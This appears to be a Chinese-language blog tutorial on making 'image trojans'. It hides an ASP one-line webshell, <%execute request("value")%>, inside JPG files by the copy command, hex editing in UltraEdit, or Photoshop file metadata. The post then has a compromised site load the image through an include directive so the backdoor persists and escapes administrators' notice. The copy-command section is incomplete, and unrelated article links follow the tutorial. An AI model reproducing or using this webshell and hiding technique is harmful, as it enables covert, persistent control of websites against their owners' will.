图片木马制作的三种方法
1.Copy命令制作
1.asp内容:
打开cmd,数据一下命令:
此时打开两个jpg文件,相比:
且打开2.jpg可以像1.jpg一样显示图像。
把以下代码放入目标网站,即可按asp执行。
<% #include files=”2.jpg”%>
2.Uedit32
本制作来自于:雪糕。
我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误:
Microsoft VBScript 运行时错误 错误 '800a000d'
类型不匹配: 'execute'
/news1/show.asp,行 3
所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码:
<!--#include file="图片后门地址"-->
这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。
新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。
制作步骤:
一、前期准备
材料:
1.一张图片:1.jpg
2.一句话木马服务器端代码:
<%execute request("value")%>(其他的一句话也行)
3.一句Script标签:
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>一句话木马服务器端代码</SCRIPT>
4. 调用图片后门代码:
<!--#include file="图片地址"-->
工具:UltraEdit
二、开始制作:
1.使用UltraEdit打开1.jpg文件,然后按CTRL +F 进行查找图片中的“<%”和“%>”
其中<%的十六进制代码是3E 25,那么%>就应该是25 3E,但是我们只把25改成00;
之后我们在新建一个文本编辑窗口,将我们的script标签代码
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT><%execute request("value")%></SCRIPT>
复制进去,然后点击右键选择十六进制编辑命令,这样会跳转到十六进制数据窗口,
复制所有的十六进制的数据,粘贴到1.jpg的十六进制编辑窗口的最下面,
说明:为什么要粘贴到最下面?
假设你把srcipt标签的十六进制代码粘贴到中间的话,就会破坏图片的完整性,那样下面的图片就看不到了,但是插入的一句话代码还是起作用的。如图:
最后保存退出。完成整个过程,我们的图片后门就做成。
看到了吧,图片和原来还是一样的,但有时候会影响图片显示效果。
说明:为什么要把“<%”和“%>”对应的十六进制中的25改成00呢?改成其他的行不行?
雪糕猜想:因为在我们的一句话木马服务器代码<%execute request("value")%>中含有“<%”和“%>”们,但我们使用一句话客户端连接时,就可能发生寻找错误,然后就找不到我们的一句话服务器端代码了,所以要把图片中的相似结构改成其他的。我想25也应该可以改成别的,但还没实验过。
2.我们已经做好了图片后门,然后就是简单的配置一下了。
如果网站的asp网页可以被写入,那我们就将<!--#include file="1.jpg"-->直接插入到网页中,这样这个网页的url就是成了我们使用一句话客户端连接的后门地址了;但要是不走运,那就自己新建一个asp文件,把<!--#include file="1.jpg"-->加进去吧(这里我新建了一个1.asp文件)。
3.Ps插入
1.用PS(photoshop)打开图片
2.文件→文件简介
插入你需要的木马代码
3.文件→保存(保存:覆盖源文件 你也可以另存为你想要的其它格式)
图片木马制作的三种方法相关推荐
- CSS图片水平垂直居中的三种方法
CSS图片水平垂直居中的三种方法 设置行高 使用定位和translate 使用弹性盒子 设置行高 我们知道img元素为行内快元素,所以首先设置图片元素的父元素里文字水平居中,行高与整体高度一致. 其次 ...
- 如何放大图片,教您三种方法!
在日常生活中,我们经常会对一些尺寸不符合的照片进行放大处理,在这里我们就需要一些特殊的方法,接下来我们介绍三种方法. 最懒的方法:直接拉伸小图截取 简易程度:★★★★★ 图片质量:★ 适用人群:只需要 ...
- html清除图片上下间距,css - 三种方法解决LI和内部Img的上下间距问题
在火狐浏览器和谷歌浏览器(qq浏览器,谷歌内核)bug类似这张图: img的高度是190*127 但是放到li中,li并没有设置高度,却和内部的图片之间上下错位. 若强行给li设置高度127,他和im ...
- 让网页图片变灰色的三种方法
我一直喜欢灰度图像因为我认为他们看起来更有艺术感.很多图片编辑如Photoshop很容易把你的彩色图像变成灰度.甚至有选择调整颜色深度和色调.不幸的是,这样的效果想做在网络上并不容易,因为浏览器有差异 ...
- js 将图片置灰_让网页图片变灰色的三种方法
我一直喜欢灰度图像因为我认为他们看起来更有艺术感.很多图片编辑如Photoshop很容易把你的彩色图像变成灰度.甚至有选择调整颜色深度和色调.不幸的是,这样的效果想做在网络上并不容易,因为浏览器有差异 ...
- 如何批量旋转图片?学会这三种方法就能轻松实现
对于喜爱拍照的小伙伴来说,你们的手机或者相机应该有很多图片素材吧.那么在整理这些图片到电脑的时候,你们的图片会不会出现方向不一致的情况呢?有的是倒着的,有的是左旋了90°.想要将这些图片都调整为同 ...
- 前端PS中怎么把图片调暗?三种方法一键get
第一种:设置图片曲线法 第一步:先将图片置入PS里面来,如下图所示: 第二步:打开图像菜单栏中的曲线调节,如图 第三步:降低曲线的数值,如图所示,这样就可以将图片的亮度降低下来 第二种:打开图像中的色 ...
- Android 实现图片轮播的三种方法,android开发者论坛
public Object instantiateItem(ViewGroup container, int position) { // 对ViewPager页号求模取出View列表中要显示的项 p ...
- PDF文件如何转JPG图片?三种方法教你快速转换
PDF文件是我们经常用来处理工作的一种文件形式,它的体积很小,不仅占用储存空间很少,而且传输起来也非常方便,但是有时候我们也会根据工作需求来将PDF文件转换成其他类型的文件,为了浏览起来更方便,我们也 ...
最新文章
- PLSQL创建Oracle定时任务
- Hadoop文件系统元数据fsimage和编辑日志edits
- Mysql 解决1251- Client does not support authentication protocol requested by server...的问题
- POJ 1765 November Rain
- Linux(四)——redis服务
- Windows Server 2008 如何在IIS中添加MIME类型
- Base PyQt4, Simple Web APP Framwork
- 创建您的第一个servlet
- scrapy从安装到爬取煎蛋网图片
- WINCE Driver 心得总结
- IIS新建站点服务器,localhost能登录但是IP访问登录不了。
- 无法连接NVIDIA驱动:NVIDIA-SMI has failed because it couldn’t communicate with the NVIDIA driver
- 计算机WIN7动态硬盘分区,win7电脑硬盘分区的具体操作方法
- java找不到符号 符号:类xxx位置xxxx
- 计算机03年word做母亲节贺卡,怎样制作母亲节贺卡
- 第7章 面向对象技术
- java棒棒糖和皮卡丘八音盒_KFC用玩具提前要走了压岁钱
- (六)Activiti之实现学生请假流程
- Linux 之 开机自启动
- UE4模型轮廓描边及轮廓发光
热门文章
- 喇叭 阻抗(问题) 小结
- 卷积(convolution)最容易理解的解释
- 动态规划01背包算法详解
- 论文笔记:全景图恢复房间结构(Room Layout Estimation From A Panorama Image)
- AI新时代拐点:人工智能当红炸子鸡Chatgpt
- Django小实战——在线Web计算器(利用Bootstrap进行前端开发)
- MFC—— AfxMessageBox
- 徕卡 L1、L2腕表 评测
- 现代神经网络(VGG),并用VGG16进行实战CIFAR10分类
- oracle dg ora-12154,主库到standby报错解决:Error 12154 received logging on to the standby ORA-12154...